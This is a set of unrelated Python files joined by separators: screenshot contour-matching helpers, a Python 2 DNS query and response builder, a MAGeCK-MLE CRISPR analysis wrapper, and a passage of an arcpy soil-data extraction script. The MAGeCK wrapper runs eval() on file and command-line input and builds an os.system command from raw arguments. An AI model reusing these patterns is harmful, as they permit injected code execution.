    root.setLevel(logging.DEBUG)
    ch = logging.StreamHandler(sys.stdout)
    # BUG FIX: the handler level was set to DEBUG and then immediately
    # overwritten with ERROR; only the effective ERROR setting is kept.
    ch.setLevel(logging.ERROR)
    # formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    formatter = logging.Formatter('%(name)s - %(message)s')
    ch.setFormatter(formatter)
    root.addHandler(ch)
    # PIL's PNG plugin logs very chatty DEBUG messages.
    logging.getLogger("PIL.PngImagePlugin").setLevel(logging.INFO)
    # (Removed a dead `if False:` block that silenced two named loggers.)
def timeit(method):
    """Decorator that logs the wall-clock runtime of *method* at DEBUG level."""
    def timed(*args, **kw):
        start = time.time()
        result = method(*args, **kw)
        elapsed_ms = (time.time() - start) * 1000
        logger.debug('%r %2.2f ms' % (method.__name__, elapsed_ms))
        return result
    return timed
def diff_polygons(contour_1, contour_2, scale_polygons=True):
    """
    Compare two contours' polygons by shape.

    :param contour_1: Contour with a shapely ``polygon`` attribute (or None)
    :param contour_2: Contour with a shapely ``polygon`` attribute (or None)
    :param scale_polygons: if True, scale poly2 to poly1's bounding-box size
        so only shape (not size) differences count
    :return: Total of non intersecting area
    """
    # A huge sentinel area means "no match possible".
    if contour_1 is None or contour_2 is None:
        return 10000000000000
    poly1 = contour_1.polygon
    poly2 = contour_2.polygon
    if not poly1.is_valid or not poly2.is_valid:
        logger.warning("Polygons not valid")
        return 10000000000000
    minx1, miny1, maxx1, maxy1 = poly1.bounds
    minx2, miny2, maxx2, maxy2 = poly2.bounds
    width1 = maxx1 - minx1
    width2 = maxx2 - minx2
    height1 = maxy1 - miny1
    height2 = maxy2 - miny2
    if scale_polygons:
        poly2 = scale(geom=poly2, xfact=width1 / width2, yfact=height1 / height2, origin='centroid')
    # Align both polygons to the origin before intersecting.
    poly1 = translate(poly1, xoff=-poly1.bounds[0], yoff=-poly1.bounds[1])
    poly2 = translate(poly2, xoff=-poly2.bounds[0], yoff=-poly2.bounds[1])
    intersecting_area = poly1.intersection(poly2).area
    # Symmetric-difference area = total area minus twice the overlap.
    return poly1.area + poly2.area - 2 * intersecting_area
def display_image_with_contours(grey_array, contours):
    """Show *grey_array* (optional) with every contour overlaid on top."""
    # Display the image and plot all contours found
    fig, ax = plt.subplots()
    if grey_array is not None:
        ax.imshow(grey_array, interpolation='nearest', cmap=plt.cm.gray)
    # Contours are (row, col) point arrays: column 1 is x, column 0 is y.
    for n, contour in enumerate(contours):
        ax.plot(contour[:, 1], contour[:, 0], linewidth=2)
    ax.axis('image')
    ax.set_xticks([])
    ax.set_yticks([])
    plt.show()
def rgb_yx_array_to_grayscale(array):
    """Convert an RGB (y, x, channel) image array to a 2D grayscale array."""
    pil_image = Image.fromarray(array)
    return np.array(pil_image.convert('L'))
def card_to_grayscale_2d_array(image):
    """Convert a PIL card image to a 2D grayscale numpy array."""
    # (A resize to cfg.CARD_HEIGHT_PIXELS x cfg.CARD_WIDTH_PIXELS used to
    # happen here.)
    return np.array(image.convert('L'))
def trim_main_window_image_array(image_array):
    """Crop a screenshot to the configured game window and strip the
    all-black margin from the left edge."""
    image_array = image_array[cfg.ZYNGA_WINDOW.min_y:cfg.ZYNGA_WINDOW.max_y,
                  cfg.ZYNGA_WINDOW.min_x:]
    # Scan up to 300 columns for the first one with any non-zero pixel.
    left_index = 0
    for i in range(0, 300):
        column_sum = np.sum(image_array[:, i])
        if column_sum > 0:
            break
        left_index = i
    # NOTE(review): left_index is the last all-zero column, so one blank
    # column is retained -- confirm whether that off-by-one is intentional.
    image_array = image_array[:, left_index:]
    return image_array
def get_game_area_as_2d_array(screenshot_file_path):
    """Load a screenshot from disk and return the trimmed game-window pixels."""
    image = Image.open(screenshot_file_path)
    image_array = np.array(image)
    return trim_main_window_image_array(image_array)
def find_contours(
        grey_array, min_width=5, max_width=15,
        min_height=5, max_height=100,
        value_threshold=150,
        fully_connected="low",
        display=False
):
    """
    Generator over card contours whose bounding boxes satisfy the given
    width/height limits; contours fully contained in an earlier contour
    are subtracted from it and not yielded themselves.

    :param grey_array: 2D grayscale array to search
    :param value_threshold: intensity level passed to skimage find_contours
    :return: iterable of contours in card
    """
    # grey_array[grey_array < 150] = 0
    # grey_array[grey_array >= 150] = 255
    if grey_array is None or grey_array.ndim != 2:
        logger.warning("Not a valid array passed to find_contours")
        return
    # http://scikit-image.org/docs/dev/auto_examples/edges/plot_contours.html?highlight=find_contours
    all_contours = measure.find_contours(grey_array, level=value_threshold, fully_connected=fully_connected)
    # Todo find inner shapes and subtract from polygon
    contour_list = []
    for points_array in all_contours:
        b = BoundingBox()
        b.min_y, b.min_x = np.min(points_array, axis=0)
        b.max_y, b.max_x = np.max(points_array, axis=0)
        c = Contour()
        c.bounding_box = b
        # Close the contour if skimage returned an open point sequence.
        if not np.array_equal(points_array[0], points_array[-1]):
            points_array = np.append(points_array, np.expand_dims(points_array[0], axis=0), axis=0)
        c.set_points_array(points_array)
        contour_list.append(c)
    # Sort left-to-right so the containment scan below can stop early.
    contour_list = sorted(contour_list, key=lambda x: x.bounding_box.min_x)
    if display:
        display_image_with_contours(grey_array, [c.points_array for c in contour_list])
    for idx, c in enumerate(contour_list):
        # Entries consumed as inner shapes are set to None below.
        if c is None:
            continue
        width = c.bounding_box.max_x - c.bounding_box.min_x
        height = c.bounding_box.max_y - c.bounding_box.min_y
        if width < min_width or width > max_width:
            # logger.debug(f"Skipping contour #{idx}: {c} due to width")
            continue
        if height < min_height or height > max_height:
            # logger.debug(f"Skipping contour #{idx}: {c} due to height")
            continue
        # print(f"Found contour @ {min_x},{min_y} Width={width} Height={height} Numpoints={len(contour)}")
        if display:
            # display_image_with_contours(grey_array, [c.points_array ])
            pass
        if not c.polygon.is_valid:
            logger.warning("Polygon is not valid")
            continue
        # See if any additional contours fit 100% inside
        for idx2 in range(idx + 1, len(contour_list)):
            c2 = contour_list[idx2]
            if c2 is None:
                continue
            if c2.polygon is not None and c.polygon.contains(c2.polygon) and c2.polygon.is_valid:
                c.polygon = c.polygon.difference(c2.polygon)
                # don't return it in future runs
                contour_list[idx2] = None
            elif c2.bounding_box.min_x > c.bounding_box.max_x:
                # Sorted by min_x: nothing further right can be inside c.
                break
        yield c
def generate_points_list(width, height):
    """
    returns a 2d array, x,y of all points in an
    integer grid of width/height
    """
    ys, xs = np.mgrid[0:height, 0:width]
    return np.column_stack((xs.ravel(), ys.ravel()))
def extract_polygon_mask_from_contour(contour, width, height, all_grid_points_list):
    """
    :param contour: a y/x list of points
    :param width: mask width in pixels
    :param height: mask height in pixels
    :param all_grid_points_list: flat (x, y) grid, e.g. from generate_points_list()
    :return: An image of height x width with True where the pixel is in the
    polygon defined by the contour
    """
    # Swap columns: contour is (y, x) but matplotlib Path expects (x, y).
    # https://stackoverflow.com/questions/4857927/swapping-columns-in-a-numpy-array
    contour_xy = contour[:, [1, 0]]
    # https://matplotlib.org/api/path_api.html#matplotlib.path.Path
    path = Path(contour_xy)
    # radius=-1 shrinks the effective polygon slightly (see
    # Path.contains_points docs), excluding border pixels.
    grid = path.contains_points(all_grid_points_list, radius=-1)
    grid = grid.reshape((height, width))
    return grid
def extract_image_with_mask(image, boolean_mask, background_color):
    """
    Return a copy of *image* with everything outside the mask blanked out.

    :param image: 2d numpy array, y x
    :param boolean_mask: same size as image, True to extract
    :param background_color: value written where boolean_mask is False
    :return: new array; *image* itself is left untouched
    """
    extracted = image.copy()
    extracted[~boolean_mask] = background_color
    return extracted
def clip_and_save(p_orig_image, x, y, w, h, file_name):
    """
    Crop a (w+1) x (h+1) region at (x, y) and save it under
    cfg.EXTRACTED_IMAGES_PATH.

    :param p_orig_image: cv2 image with dimensions [y][x][RGB] = 0-255
    :param file_name: output file name (joined onto EXTRACTED_IMAGES_PATH)
    :return: None
    """
    os.makedirs(cfg.EXTRACTED_IMAGES_PATH, exist_ok=True)
    # +1 makes the crop inclusive of the far edge of the bounding box.
    crop_img = p_orig_image[y:y + h + 1, x:x + w + 1]
    # save the result
    cv2.imwrite(os.path.join(cfg.EXTRACTED_IMAGES_PATH, file_name), crop_img)
|
#!/usr/bin/python
import os, struct, socket, time, random, select
from dijkstra import getBestServer
def s(i):
    # Pack an int as a big-endian unsigned short (2 bytes).
    return struct.pack('>H', i)
def b(i):
    # Pack an int as a single unsigned byte.
    return struct.pack('>B', i)
def us(i):
    # Unpack a big-endian unsigned short (2 bytes) into an int.
    return struct.unpack('>H', i)[0]
def ub(i):
    # Unpack a single unsigned byte into an int.
    return struct.unpack('>B', i)[0]
SERVERS = []   # candidate server IPs, filled by serverSetup()
SERV_CURR = 0  # round-robin cursor into SERVERS
# DEFAULTS
# Default DNS header field values (RFC 1035, section 4.1.1).
TRANS_ID = us(os.urandom(2))
FLAGS_QR = 0 #Query
FLAGS_Opcode = 0 #Std query
FLAGS_AA = 1 #is an authority
FLAGS_TC = 0 #not truncated
FLAGS_RD = 0 #not asking for recursion
FLAGS_RA = 0 #recursion not allowed (or is a request)
FLAGS_Zero = 0 # always zero
FLAGS_RCode = 0 # no errors
FLAGS = 0
NUM_QUESTIONS = 1
NUM_ANSWERS = 0
NUM_AUTHORITY = 0
NUM_ADDITIONAL = 0
QType = 1 # A record
QClass = 1 # IN
LOG_FILE = None  # opened by serverSetup()
def serverSetup(servers_file, log):
    """Load candidate server IPs and open the request log.

    :param servers_file: newline-separated list of server IPs
    :param log: path of the log file to write requests to
    """
    global LOG_FILE
    global SERVERS
    SERVERS = open(servers_file).read().split('\n')
    # Drop the trailing empty entry produced by a final newline.
    if SERVERS[-1] == '':
        SERVERS = SERVERS[:-1]
    # Buffering 0 = unbuffered (Python 2 text mode) so the log is always current.
    LOG_FILE = open(log, 'w', 0)
def genFlags(query):
    """Build the 16-bit DNS FLAGS field from the module-level flag bits.

    For a response (query falsy) sets QR=1 and announces one answer.
    Mutates the FLAGS_QR, NUM_ANSWERS and FLAGS globals.
    """
    global FLAGS_QR, NUM_ANSWERS, FLAGS
    if not query:
        FLAGS_QR = 1
        NUM_ANSWERS = 1
    # Byte 1: QR | Opcode | AA | TC | RD ; Byte 2: RA | Z | RCode.
    FLAGS_B1 = FLAGS_QR<<7 | FLAGS_Opcode <<3 | FLAGS_AA <<2 | FLAGS_TC <<1 | FLAGS_RD
    FLAGS_B2 = FLAGS_RA<<7 | FLAGS_RCode
    FLAGS = FLAGS_B1<<8 | FLAGS_B2
def genMessage(query_str, query=1, ROUND_ROBIN=0, servers_file="", lsa_file="", addr="", logfile=None):
    """Build a DNS message for *query_str* (Python 2).

    :param query_str: dotted hostname to encode in the question section
    :param query: 1 to build a query, 0 to build a response with one A answer
    :param ROUND_ROBIN: when answering, pick servers round-robin instead of
        via getBestServer()
    :param addr: client (ip, port) tuple; addr[0] is used for server
        selection and logging when answering
    :return: (wire-format message, chosen server IP as a list of 4 ints,
        or "" for plain queries)
    """
    global SERV_CURR
    # Lazily load the server list the first time a response is built.
    if not query and len(SERVERS) == 0:
        serverSetup(servers_file, logfile)
    genFlags(query)
    # 12-byte DNS header.
    message = s(TRANS_ID)+s(FLAGS)+s(NUM_QUESTIONS)+s(NUM_ANSWERS)+s(NUM_AUTHORITY)+ \
        s(NUM_ADDITIONAL)
    # Calc lengths for Query string
    # (one length per dot-separated label; the final label is appended after
    # the loop from whatever was not yet consumed).
    lens = []
    i = 0
    while i in xrange(len(query_str)):
        k = 0
        for j in xrange(i,len(query_str)):
            if query_str[j] == '.':
                lens.append(k)
                break
            k += 1
        i = j+1
    total_read = sum(lens)+len(lens)
    lens.append(len(query_str)-total_read)
    # Insert lengths and names into message
    message += b(lens[0])
    l = 1
    for i,c in enumerate(query_str):
        if c == '.':
            message += b(lens[l])
            l += 1
        else:
            message += struct.pack('c',c)
    message += b(0)
    message += s(QType)
    message += s(QClass)
    # build RR's
    RR_ADDR = ""
    if not query:
        # # Insert lengths and names into message
        # message += b(lens[0])
        # l = 1
        # for i,c in enumerate(query_str):
        #     if c == '.':
        #         message += b(lens[l])
        #         l += 1
        #     else:
        #         message += struct.pack('c',c)
        # message += b(0)
        # 0xC00C is a compression pointer to the name at offset 12 (the question).
        RR_NAME = 49164 #C0 0C
        message += s(RR_NAME)
        RR_QTYPE = 1 #A record
        RR_QCLASS = 1 #IN
        RR_TTL = 0 # no caching
        RR_DATALENGTH = 4
        if ROUND_ROBIN:
            RR_ADDR = SERVERS[SERV_CURR]
            SERV_CURR = (SERV_CURR + 1) % len(SERVERS)
        else:
            # Pick the best server for this client via the LSA graph.
            RR_ADDR = getBestServer(addr[0], SERVERS, lsa_file)
        message += s(RR_QTYPE)+s(RR_QCLASS) + \
            struct.pack('>I',RR_TTL) + s(RR_DATALENGTH)
        # Append the IPv4 address as 4 raw bytes.
        RR_ADDR = [int(float(a)) for a in RR_ADDR.split('.')]
        for a in RR_ADDR:
            message += b(a)
        # Log: "<unix time> <client ip> <queried name> <answer ip>".
        t = int(time.time())
        out_addr = '.'.join([str(r) for r in RR_ADDR])
        log_s= ' '.join([str(t),addr[0],query_str,out_addr])
        print log_s
        LOG_FILE.write(log_s+'\n')
    return (message, RR_ADDR)
def parseMessage(data, query=0):
    """Parse a wire-format DNS message (Python 2 byte-string indexing).

    :param data: raw DNS message
    :param query: 1 when parsing an incoming query (adopts its transaction
        ID into the global TRANS_ID), 0 when parsing a response
    :return: (queried name, answer IP or "", flags dict -- empty for queries)
    """
    global TRANS_ID
    R_TRANS_ID = us(data[0:2])
    if query:
        TRANS_ID = R_TRANS_ID
    # Split the 16-bit FLAGS field back into its bit fields.
    R_FLAGS = us(data[2:4])
    R_FLAGS_B1 = R_FLAGS >> 8
    R_FLAGS_B2 = R_FLAGS & 255
    R_FLAGS_QR = (R_FLAGS_B1 & 128) >> 7
    R_FLAGS_Opcode = (R_FLAGS_B1 & (15<<3)) >> 3
    R_FLAGS_AA = (R_FLAGS_B1 & 4) >> 2
    R_FLAGS_TC = (R_FLAGS_B1 & 2) >> 1
    R_FLAGS_RD = (R_FLAGS_B1 & 1)
    R_FLAGS_RA = (R_FLAGS_B2 & 128) >> 7
    R_FLAGS_Zero = (R_FLAGS_B2 & (7<<4)) >> 4
    R_FLAGS_RCode = R_FLAGS_B2 & 15
    R_NUM_QUESTIONS = us(data[4:6])
    R_NUM_ANSWERS = us(data[6:8])
    R_NUM_AUTHORITY = us(data[8:10])
    R_NUM_ADDITIONAL = us(data[10:12])
    # Decode the length-prefixed QNAME labels into a dotted name.
    R_INPUT = []
    i = 13
    l = ub(data[12])
    while l != 0:
        R_INPUT += data[i]
        i += 1
        l -= 1
        if l == 0:
            l = ub(data[i])
            i += 1
            R_INPUT += '.'
    # Drop the trailing '.' appended after the last label.
    R_INPUT = ''.join(R_INPUT[:-1])
    R_QType = us(data[i:i+2]) # A record
    i += 2
    R_QClass = us(data[i:i+2]) # IN
    i += 2
    # print R_FLAGS_QR, R_FLAGS_Opcode, R_FLAGS_AA, R_FLAGS_TC, R_FLAGS_RD
    # print R_FLAGS_RA, R_FLAGS_Zero, R_FLAGS_RCode
    # print R_NUM_QUESTIONS, R_NUM_ANSWERS, R_NUM_AUTHORITY, R_NUM_ADDITIONAL
    RR_ADDR = ""
    RR_NAME = ""
    if R_NUM_ANSWERS:
        # The answer name is either a 0xC00C compression pointer or a
        # literal length-prefixed name.
        if us(data[i:i+2]) == 49164: # C0 0C
            RR_NAME = us(data[i:i+2]) # should be C0 0C
            i += 2
        else:
            l = ub(data[i])
            i += 1
            while l != 0:
                RR_NAME += data[i]
                i += 1
                l -= 1
                if l == 0:
                    l = ub(data[i])
                    i += 1
                    RR_NAME += '.'
            RR_NAME = ''.join(RR_NAME[:-1])
        RR_TYPE = us(data[i:i+2]) # A record
        i += 2
        RR_CLASS = us(data[i:i+2]) # IN
        i += 2
        # TTL is a 32-bit value read as two 16-bit halves.
        # NOTE(review): the high half is shifted by 8, not 16 -- looks like
        # a bug for TTLs >= 2^16, harmless here since TTL is always 0.
        RR_TTL = (us(data[i:i+2])<<8) + (us(data[i+2:i+4]))
        i += 4
        RR_DL = us(data[i:i+2])
        i += 2
        # The 4-byte RDATA is the answer IPv4 address.
        addr = [ub(data[i:i+1]),ub(data[i+1:i+2]),ub(data[i+2:i+3]),ub(data[i+3:i+4])]
        addr = [str(a) for a in addr]
        RR_ADDR = '.'.join(addr)
        # print RR_NAME, RR_TYPE, RR_CLASS, RR_TTL, RR_DL
    flags = {}
    if not query:
        flags = {'sent_trans_id' : TRANS_ID, 'recv_trans_id' : R_TRANS_ID, 'qr' : R_FLAGS_QR,
            'opcode' : R_FLAGS_Opcode, 'aa' : R_FLAGS_AA, 'tc' : R_FLAGS_TC, 'rd' : R_FLAGS_RD,
            'ra' : R_FLAGS_RA, 'z' : R_FLAGS_Zero, 'rcode' : R_FLAGS_RCode,
            'num_questions' : R_NUM_QUESTIONS, 'num_answers' : R_NUM_ANSWERS,
            'num_authority' : R_NUM_AUTHORITY, 'num_additional' : R_NUM_ADDITIONAL,
            'qtype' :R_QType, 'qclass' : R_QClass, 'rr_name' : RR_NAME, 'rr_qtype' : RR_TYPE,
            'rr_qclass' : RR_CLASS, 'rr_ttl' : RR_TTL, 'rr_dl' : RR_DL}
    return (R_INPUT, RR_ADDR, flags)
def sendDNSQuery(query, local_ip, server_ip, server_port):
    """Send a DNS query for *query* over UDP and parse the response.

    :param local_ip: local interface to bind (ephemeral port)
    :raises Exception: if no response arrives within two 1-second waits
    :return: parseMessage() result for the response
    """
    message = genMessage(query, 1)[0]
    dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    dns_sock.bind((local_ip,0))
    dns_sock.sendto(message, (server_ip, server_port))
    dns_sock.setblocking(0)
    data = []
    # Poll the socket for up to two 1-second select() rounds.
    for i in xrange(2):
        ready = select.select([dns_sock], [], [], 1)
        if ready[0]:
            data, _ = dns_sock.recvfrom(1024)
            break
    if not data:
        raise Exception("DNS server failed to respond")
    return parseMessage(data, 0)
|
import io, os, csv, random
import sys
def prepareFile(filename, hdr):
    """Open *filename* positioned just before its header row.

    Scans for the first line containing *hdr* (up to 100 lines), then
    reopens the file with any preamble lines skipped.  Returns the open
    file object and the detected delimiter (',' for .csv, tab otherwise).
    """
    # Count any lines before the headers (should be skipped).
    probe = io.open(filename)
    skip_lines = 0
    line = probe.readline()
    while hdr not in line and skip_lines < 100:
        skip_lines += 1
        line = probe.readline()
    probe.close()
    if skip_lines >= 100:
        raise Exception('Could not find line with header ' + hdr + ' in ' + filename)
    # Check for comma vs tab delimited.
    delim = ',' if (filename.split('.')[-1] == 'csv') else '\t'
    # Reopen the file and skip to the start of the data.
    f = io.open(filename)
    for _ in range(skip_lines):
        f.readline()
    return f, delim
def convertChars(rep):
    """Replace the characters space, '.', ';' and ',' with underscores."""
    return ''.join('_' if ch in ' .;,' else ch for ch in rep)
def createDesignMatrixFile(repfile, rep_hdr, sample_hdr, ctrl_sample, outfile):
    """Write a MAGeCK-MLE design matrix mapping replicates to samples.

    :param repfile: csv/tab file mapping replicate labels to sample labels
    :param ctrl_sample: sample that gets no column of its own (baseline only)
    :param outfile: path of the tab-delimited design matrix to write
    """
    f, delim = prepareFile(repfile, rep_hdr)
    rdr = csv.DictReader(f, delimiter=delim)
    # replicate label -> sample label
    rep_map = {row[rep_hdr]: row[sample_hdr] for row in rdr}
    # Every non-control sample gets its own design column.
    # NOTE(review): set iteration order is not deterministic across runs,
    # so column order may vary -- confirm downstream tooling tolerates this.
    cell_lines = [x for x in set([rep_map[x] for x in rep_map]) if x != ctrl_sample]
    f.close()
    fout = io.open(outfile, 'w')
    fout.write(u'Samples\tbaseline\t%s\n' % '\t'.join(cell_lines))
    # One row per replicate: baseline is always 1, then a 0/1 indicator
    # marking which sample the replicate belongs to.
    for rep in rep_map:
        fout.write(u'%s\t1\t%s\n' % (convertChars(rep), '\t'.join(['%d' % int(x==rep_map[rep]) for x in cell_lines])))
    fout.close()
def formatCountFile( countfile, guidemappingfile, sgrna_hdr, gene_hdr, outprefix ):
    """Rewrite the count file as tab-delimited 'sgRNA<TAB>gene<TAB>samples...'.

    Returns *countfile* unchanged when it is already in the expected format,
    otherwise writes and returns a new <outprefix>_*.txt file (Python 2).
    """
    delim = ',' if countfile[-4:]=='.csv' else '\t'
    f = io.open(countfile); rdr = csv.DictReader(f, delimiter=delim)
    guide_col = rdr.fieldnames[0]
    has_gene_col = (rdr.fieldnames[1].upper() == 'GENE')
    # Already tab-delimited with a gene column and clean sample names: use as is.
    if has_gene_col and delim=='\t' and sum([convertChars(x) != x for x in rdr.fieldnames[1:]])==0: return countfile
    if not has_gene_col:
        # Build the guide -> gene mapping from the separate mapping file.
        fg = io.open(guidemappingfile)
        fg_delim = ',' if guidemappingfile[-4:]=='.csv' else '\t'
        guide_map = {row[sgrna_hdr]: row[gene_hdr] for row in csv.DictReader(fg, delimiter=fg_delim)}
        fg.close()
    newcountfile = outprefix + '_' + countfile.split('/')[-1][:-4] + '.txt'
    fout = io.open(newcountfile, 'w')
    fout.write(u'sgRNA\tgene\t%s\n' % '\t'.join([convertChars(x) for x in rdr.fieldnames[1+has_gene_col:]]))
    for row in rdr:
        if has_gene_col: gene = row[rdr.fieldnames[1]]
        elif row[guide_col] not in guide_map:
            # Guides without a gene mapping are dropped.
            continue
        else: gene = guide_map[row[guide_col]]
        try:
            # Sanity check: every count field must evaluate as a number.
            # NOTE(review): eval() on file contents is unsafe for untrusted input.
            [eval(row[hdr]) for hdr in rdr.fieldnames[1+has_gene_col:]]
        except:
            print 'EXCEPTION IN ROW:', row
        fout.write(u'%s\t%s\t%s\n' % (row[guide_col], gene, '\t'.join(row[hdr] for hdr in rdr.fieldnames[1+has_gene_col:])))
    fout.close()
    return newcountfile
# Command-line driver: parse arguments, build the design matrix, normalize
# the count file and invoke MAGeCK-MLE.
if len(sys.argv) != 6:
    print 'Usage: run_mageck_mle.py countfile replicatefile:rep_hdr:sample_hdr:ctrl_sample genemapfile:guide_hdr:gene_hdr outputprefix threads'
else:
    #Parse arguments
    countfile = sys.argv[1] #sgrna label is always in the first column, gene in the second
    rep_toks = sys.argv[2].split(':')
    if len(rep_toks) != 4:
        raise Exception('Incorrect replicate file input: expecting "replicatefile:rep_hdr:sample_hdr:ctrl_sample" where replicatefile is a csv or tab delimited file mapping replicates to samples, rep_hdr and sample_hdr specify the column headers for the columns containing the replicate labels and sample labels respectively, and ctrl_sample specifies the name of the control sample')
    replicatefile, rep_hdr, sample_hdr, ctrl_sample = rep_toks
    guide_toks = sys.argv[3].split(':')
    if len(guide_toks) != 3:
        raise Exception('Incorrect guidemappingfile input: expecting "guidemappingfile:sgrna_hdr:gene_hdr" where guidemappingfile is a csv or tab delimited file mapping guides to genes, sgrna_hdr and gene_hdr specify the column headers for the columns containing the guide labels and gene labels respectively.')
    guidemappingfile, sgrna_hdr, gene_hdr = guide_toks
    outprefix = sys.argv[4]
    # Create the output directory if the prefix points into one.
    outdir = '/'.join(outprefix.split('/')[:-1])
    if outdir != '' and not os.path.isdir(outdir):
        os.mkdir(outdir)
    # NOTE(review): eval() on a CLI argument is unsafe; int() would do.
    threads = eval(sys.argv[5])
    #Create the design matrix file
    designfile = outprefix + '_designmat.txt'
    createDesignMatrixFile(replicatefile, rep_hdr, sample_hdr, ctrl_sample, designfile)
    #Adjust the input file (if needed)
    countfile = formatCountFile( countfile, guidemappingfile, sgrna_hdr, gene_hdr, outprefix )
    #Run Mageck-MLE
    cmd = "mageck mle -k %s -d %s -n %s --threads %d" % (countfile, designfile, outprefix, threads)
    print cmd
    os.system(cmd)
|
# ---------------------------------------------------------------------------
# Created by: Ryan Spies (rspies@lynkertech.com)
# Date: 6/9/2015
# UPDATED (10/14/2015): use a search cursor loop on a shapefile containing multiple basins
# extract_basin_gSSURGO_data.py
# Description: extract gSSURGO gridded soil data using basin shapefiles and write
# a land cover count summary to csv file
# NOTE: only runs one SSURGO raster (usually 1 file for each state) -> requires
# multiple runs for basins in more than one state
#
# Steps to set up run:
# 1. Make sure the MapunitRaster_XX_10m raster has not been joined yet (Errors with field names? & Error 000049 : Failed to build attribute table)
# 2. Open ArcMap and import the muaggatt table from the gssurgo .gdb directory
# 3. Right click on the table -> export (as dBASE Table) -> save to SSURGO\XX\soils\mukey_join.dbf
# 4. Check that the mukey attribute is type long (not string), create new column if needed
# 5. Open windows command line and navigate to script (needs arcmap 10.6 -> python v2.7?)
# 6. Execute script
# --------------------------------------------------------------------------
# Import arcpy module
print 'Importing modules...'
import arcpy
import os
import os.path
import csv
import winsound
arcpy.env.overwriteOutput = True
# Check out any necessary licenses
arcpy.CheckOutExtension("spatial")
# Derive the project and GIS-library directories relative to this script's
# location on disk.
os.chdir("../..")
maindir = os.getcwd()
os.chdir("../../..")
gisdir = os.getcwd()
################### User Input #####################
###################################################
RFC = 'WGRFC_2021'
fx_group = '' # leave blank if not processing by fx group
#in_shp = maindir + '\\' + RFC[:5] + os.sep + RFC + '\\Shapefiles_from' + RFC[:5] + '\\calb_basins\\calb_basins_DES.shp'
in_shp = "E:\\TWDB_WGRFC\\basins\\210318_Calb_Basins_Joined\\Calb_Basins.shp"
#maindir + '\\' + RFC[:5] + os.sep + RFC + '\\Shapefiles_fromRFC\\calb_basins\\' + 'marfc_fy17_calb_basins.shp'
find_ch5id = 'Arc_Name_n' # attribute table header for basin id -> must exist!!!
#find_name = 'NAME' # optional: attribute table header for more basin info
state = 'TX'
# if you only want to run specific basins -> list them below
# otherwise set it equal to empty list (basins_overwrite = [] or basins_overwrite = ['COCF1'])
basins_overwrite = ['PPDT2']#
#ignore_basins = ['NWFM1','LOMM8','LTRM8','CYNM8','MRIM8','2802','ACMM8','BHLM8','DBMM8',]
# location of the state raster SSURGO data
State_gSSURGO_Raster = 'E:\\TWDB_WGRFC\\gSSURGO\\soils_GSSURGO_tx_3899944_01\\soils\\gssurgo_g_tx\\gSSURGO_TX.gdb\\MapunitRaster_10m'
join_table = 'E:\\TWDB_WGRFC\\gSSURGO\\soils_GSSURGO_tx_3899944_01\\soils\\gssurgo_g_tx' + '\\mukey_join.dbf'
#State_soil_table = r'Q:\GISLibrary\SSURGO\TN\soils\gssurgo_g_tn.gdb\muaggatt'
# Output directory for the basin .csv summary files
# NOTE(review): both branches currently assign the same path -- presumably the
# fx_group branch was meant to use a different sub-directory; confirm.
if fx_group != '':
    output_dir = 'E:\\TWDB_WGRFC\\gSSURGO\\data_files\\'
else:
    output_dir = 'E:\\TWDB_WGRFC\\gSSURGO\\data_files\\'
######################################################
################# End User Input ######################
print 'REMINDER: Check that mukey_join.dbf "mukey" field is type long!!!'
# original mukey column is "string" type and join will skip several instances
winsound.Beep(1000,700) # beep to draw attention to the reminder above before processing starts
#raw_input("Press enter to continue processing...")
#check that the SSURGO file exists (may be named differently for older downloads)
if os.path.exists(os.path.dirname(State_gSSURGO_Raster)) == False:
    print 'Can not find SSURGO raster for ' + state
    print 'State GSSURGO Raster location: ' + State_gSSURGO_Raster
# temp_output is used as scratch space for clipped rasters and .dbf exports
if not os.path.exists('C:\\NWS\\python\\temp_output\\'):
    print "Missing directory: 'C:\\NWS\\python\\temp_output\\' -> please create"
    raw_input("Press enter to continue processing...")
if not os.path.exists(output_dir):
    print "Missing directory: " + output_dir + " -> please create"
    raw_input("Press enter to continue processing...")
print 'setup ok so far...'
ignore_basins = []
#################################################################################
# use search cursor to loop through individual basins in shapefile
basins = arcpy.SearchCursor(in_shp)
fields = arcpy.ListFields(in_shp, "", "String")
#Process: Define Projection
# Only define a projection when the shapefile has no .prj file yet
check_project = in_shp[:-4] + '.prj'
if not os.path.exists(check_project):
    sr = arcpy.SpatialReference(4269) # define projection of basin shp -> 4269 = GCS_North_American_1983
    print 'Defining Projection...'
    arcpy.DefineProjection_management(in_shp, sr)
# Search cursor info: http://resources.arcgis.com/de/help/main/10.1/index.html#//018w00000011000000
with arcpy.da.SearchCursor(in_shp, ("SHAPE@",find_ch5id)) as cursor: # search cursor gets "A geometry object for the feature" and the "NAME" attribute for each basin
    for index, row in enumerate(cursor):
        Basin_Boundary = row[0] # basin geometry
        ch5id = row[1] # basin = find_ch5id
        print 'Processing basin: ' + str(ch5id)
        print 'ch5id = ' + row[1]
        #print 'name = ' + row[2]
        if ch5id not in ignore_basins:
            ## Local variables:
            Basin_gSSURGO_Raster = 'C:\\NWS\\python\\temp_output\\x' + ch5id + 'go' #put an x in front of raster name (some basins start with number)
            Model_Output_gdb = 'C:\\NWS\\python\\temp_output\\'
            # Process: Extract by Mask
            print 'Extracting raster with basin polygon...'
            #arcpy.gp.ExtractByMask_sa(State_gSSURGO_Raster, Basin_Boundary, Basin_gSSURGO_Raster)
            try:
                arcpy.Clip_management(State_gSSURGO_Raster, "#", Basin_gSSURGO_Raster, Basin_Boundary, "0", "ClippingGeometry")
                print 'Clip successful...'
                gonogo = 'go'
            except Exception as e:
                # ERROR 001566 = clip geometry falls outside the state raster
                if e.message[:12] == 'ERROR 001566':
                    print '!!!!! Basin appears to be outside ' + state + ' raster...skipping'
                    gonogo = 'no'
                else:
                    print e.message
                    gonogo = 'no'
            if gonogo == 'go':
                # Build Basin Raster attribute table
                print 'Building basin raster attribute table...'
                arcpy.BuildRasterAttributeTable_management(Basin_gSSURGO_Raster,"Overwrite")
                # Process: Join Field
                print 'Joining "VALUE" and "hydgrpdcd" fields...'
                try:
                    arcpy.JoinField_management(Basin_gSSURGO_Raster, "VALUE", join_table, "MUKEY", "hydgrpdcd")
                    print 'Join successful!'
                except Exception as x:
                    # ERROR 000728 = join field "VALUE" missing; retry on "MUKEY"
                    if 'ERROR 000728' in x.message:
                        print 'Could not find VALUE in join... trying "mukey"'
